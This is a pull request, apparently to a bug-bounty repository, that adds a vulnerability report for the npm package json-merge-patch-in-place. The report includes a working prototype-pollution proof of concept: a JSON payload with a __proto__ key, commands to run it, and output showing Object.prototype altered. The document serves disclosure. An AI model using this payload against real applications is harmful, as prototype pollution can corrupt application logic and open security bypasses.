### PR TITLE
Prototype Pollution in json-merge-patch-in-place

### DIFF
--- a/bounties/npm/json-merge-patch-in-place/1/README.md
+++ b/bounties/npm/json-merge-patch-in-place/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`json-merge-patch-in-place` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+// poc.js
+var {patch} = require("json-merge-patch-in-place")
+const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
+var obj = {}
+console.log("Before : " + {}.polluted);
+patch(obj, payload);
+console.log("After : " + {}.polluted);
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i json-merge-patch-in-place # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```


### PR DESCRIPTION
`json-merge-patch-in-place` is vulnerable to `Prototype Pollution`